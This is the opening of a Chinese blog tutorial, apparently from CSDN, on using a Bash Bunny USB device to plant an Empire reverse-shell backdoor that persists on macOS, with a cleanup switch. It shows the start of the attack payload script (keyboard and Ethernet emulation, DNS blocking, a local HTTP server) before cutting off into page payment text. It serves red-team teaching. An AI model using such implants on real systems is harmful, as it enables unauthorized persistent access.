Bash Bunny植入与清除

在现代红队演练与渗透测试中,如何快速、隐蔽且高效地在目标系统中部署持久化后门,是攻击者常用的手段之一。而来自 Hak5 的 Bash Bunny 工具,正是实现这一目标的利器。本文将从攻击者与防御者的双重视角,深入剖析如何通过 Bash Bunny 和 Empire 框架,在 macOS 上部署一个持久化的反向连接后门,并提供一键清除机制,帮助安全人员更好地理解攻击原理与防御策略。


一、攻击场景概述

攻击者希望在 macOS 目标设备上植入一个 Empire 框架生成的反向连接后门,使其在用户每次登录时自动启动,并通过网络与攻击者的控制服务器通信。为了实现快速部署与清除,攻击者使用 Bash Bunny 的多拨码开关功能(Switch1 和 Switch2):

  • Switch1:执行攻击脚本,部署后门
  • Switch2:执行清理脚本,移除后门

整个过程无需用户交互,插入 Bash Bunny 即可完成。


二、攻击脚本(Switch1)详解

攻击脚本保存在 Bash Bunny 的 /payloads/switch1/payload.txt 路径下。该脚本通过模拟键盘输入与网络传输,实现文件下载与后门部署。

攻击脚本核心逻辑:

#!/bin/bash
# Title: OSX persistent backdoor{Injector}
# Author: Pentestit.de

LED SETUP
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E

GET SWITCH_POSITION
GET HOST_IP

cd /root/udisk/payloads/$SWITCH_POSITION/

# 启动本地 HTTP 服务用于文件传输
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值